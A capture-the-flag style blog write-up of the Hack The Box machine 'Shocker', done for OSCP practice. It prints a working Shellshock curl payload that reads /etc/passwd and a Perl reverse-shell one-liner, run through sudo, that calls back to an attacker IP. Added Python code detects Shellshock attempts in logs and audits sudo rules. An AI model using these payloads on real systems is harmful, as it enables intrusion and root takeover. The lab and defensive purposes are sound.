Back again with another OSCP box. I'm sitting my OSCP sometime this year and aiming to pass before I begin my final university year, which starts in late September. So over the remaining months I'll be going over and re-doing all the boxes I did in the beginning, but using minimal Metasploit in preparation for the exam.
Let's start with the initial recon phase, scanning and enumeration:
As usual, nmap -sV -T4 -A -p- 10.10.10.56
Only two ports open and only HTTP really proving to be a proper attack vector. Running the usual web scans reveals nothing out of the ordinary so I go ahead with my dirbuster scan before crawling the website manually myself:
Nothing for us to see apart from 2x 403 codes; maybe the website itself provides more information. Let's dive in!
So there is literally nothing on this domain. No robots.txt or any functions to mess with on the site apart from a comical-looking picture of a bug telling us to not bug him. Hmm. Where to go from here?
Well, to begin, we already have a major hint from the name of the box: "Shocker". We then look back at the only directories available on the server: one of them is "cgi-bin" and the other is "icons". If we put both these pieces together, the puzzle becomes clear as to what this box is about: exploiting the Shellshock vulnerability.
A little bit of Google-fu and reading back and forth between Shellshock and the cgi-bin directory will enlighten your mind and expand your horizons and hacker mindset.
To summarise quickly: the cgi-bin directory is a directory on the server whose contents (typically Perl and shell scripts) the web server executes as programs, with the script's output returned as the response, rather than serving them as static HTML documents and the like. Because the server passes request headers to the script through environment variables, a Bash CGI script is exactly where Shellshock's environment-variable parsing bug becomes reachable over HTTP.
Let's now go back to our initial recon phase with dirbuster, with the exception of adding in some extra extensions. I added in the common script types that are typically found in cgi-bin or potential executables, i.e. php, sh, pl, py, rb:
Yes! Success. We've finally confirmed that Shellshock is the way forth. Upon navigating to http://10.10.10.56/cgi-bin/user.txt, we download a useless file; nothing interesting. What we can do here, though, is one of two things:
Run metasploit and gain shell
Manually exploit to gain RCE, then a reverse shell (we're going with this one)
Taking a look at this gives us a one-liner we can run against the URL to get command execution:
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://10.10.10.56/cgi-bin/user.sh
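From the defender's side, the request above leaves a very recognisable trace: a header value that begins with the Bash function definition `() {` followed by trailing commands. The following added example (my own code, not from the original post) parses Apache combined-format access log lines and flags requests whose user-agent, referer or request line carries that pattern, noting whether the target was under /cgi-bin/. The log lines are constructed samples modelled on the curl call above; the IPs and timestamps are placeholders.

```python
import re

# Constructed sample lines in Apache "combined" log format (not from the original post).
# Line 1 mirrors the curl request shown in the writeup, line 3 uses the referer field instead.
SAMPLE_LOG = [
    '10.10.14.16 - - [01/Jan/2021:12:00:00 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" '
    '"() { :; }; echo; echo; /bin/bash -c \'cat /etc/passwd\'"',
    '10.10.14.16 - - [01/Jan/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
    '10.10.14.17 - - [01/Jan/2021:12:00:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 '
    '"() { ignored; }; id" "curl/7.68.0"',
]

# Apache combined log format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A Shellshock payload is a Bash function definition "() { ... }" followed by a
# command separator; the commands after the closing brace are what get executed.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{.*?\}\s*;')


def find_shellshock_attempts(lines):
    """Return one finding per log line that carries a Shellshock-style payload."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; a real pipeline would count these
        req = m.group("req")
        path = req.split(" ")[1] if " " in req else req
        # Any header the server exports to CGI scripts is a carrier, so check
        # the fields the combined format records: user-agent, referer, request line.
        for field in ("ua", "referer", "req"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append({
                    "ip": m.group("ip"),
                    "path": path,
                    "field": field,
                    "cgi": path.startswith("/cgi-bin/"),
                })
                break
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(hit)
```

A hit against a /cgi-bin/ path on a host running an unpatched Bash is the case to escalate first; hits elsewhere are still worth recording, since the same scanner will usually try several paths. Note that the combined format only records two headers, so a payload sent in, say, a Cookie or custom header would only be visible with a fuller log format or a WAF in front of the server.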
I changed this to use a bash one-liner from pentestmonkey.net to get a reverse shell connected to my netcat listener on port 1337.
User shell achieved! Only one more stop (an easier one).
First thing I did was run "sudo -l", and it revealed we can run /usr/bin/perl as root.
Easy win!
Head to this brilliant site for all known abuses of common binaries: https://gtfobins.github.io/#
I went for the reverse shell again, but this time as root. As simple as running:
sudo /usr/bin/perl -e 'use Socket;$i="10.10.14.16";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
(Change IP and PORT as needed)
Run this after you've started a new nc listener on port 1234, and you will have the reverse shell connected back to you :D
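The root step here is really a sudoers misconfiguration: an interpreter like perl run as root is a full shell as root, which is exactly what GTFOBins catalogues. As an added example (my own code, not from the original post or GTFOBins), the script below parses the output of `sudo -l` and flags any rule whose command is a binary that can spawn a shell or run arbitrary code, which is the check an administrator would run when auditing sudo rules. The sample output is constructed with a placeholder user name, and the SHELL_CAPABLE set is an assumed starter list, not a complete one; GTFOBins is the reference for the full set.

```python
import os
import re

# Constructed sample output of "sudo -l" (not the post's own output; user name is a placeholder).
SAMPLE_SUDO_L = """Matching Defaults entries for someuser on shocker:
    env_reset, mail_badpass

User someuser may run the following commands on shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /bin/true, /usr/bin/id
"""

# Assumed starter set of binaries that yield a shell or arbitrary code execution
# when run under sudo. Consult GTFOBins for the complete, maintained list.
SHELL_CAPABLE = {"perl", "python", "python3", "ruby", "bash", "sh", "vim", "vi",
                 "find", "awk", "less", "more", "env", "nmap"}

# A sudo -l rule line looks like: "    (root) NOPASSWD: /usr/bin/perl"
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s+(?P<rest>.+)$')
# Optional tags such as "NOPASSWD:" or "SETENV:" precede the command list.
TAG_RE = re.compile(r'^(?:[A-Z]+:\s*)+')


def audit_sudo_rules(sudo_l_output):
    """Return the sudo rules whose command is a shell-capable binary."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header lines and Defaults entries are skipped
        rest = m.group("rest")
        tags = TAG_RE.match(rest)
        tag_text = tags.group(0) if tags else ""
        # Several commands may share one rule, separated by commas.
        for cmd in rest[len(tag_text):].split(","):
            cmd = cmd.strip()
            binary = os.path.basename(cmd.split(" ")[0])
            if binary in SHELL_CAPABLE:
                findings.append({
                    "runas": m.group("runas").strip(),
                    "command": cmd,
                    "nopasswd": "NOPASSWD:" in tag_text,
                })
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_rules(SAMPLE_SUDO_L):
        print(finding)
```

A finding with "runas": "root" and "nopasswd": True is the worst case, since no credential at all stands between the low-privileged account and root. The fix is to remove the rule or replace the interpreter with a wrapper script that takes no user-controlled arguments.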
Thanks for taking the time to read another OSCP writeup from me. I hope you've learned something new from this blog or my previous blogs, whether it's a new tool or a better methodology and enumeration. I do have plans for other types of blogs and not just HTB, but those will be out later, as I'm prioritising my OSCP preparation now that my exams are over for the meantime.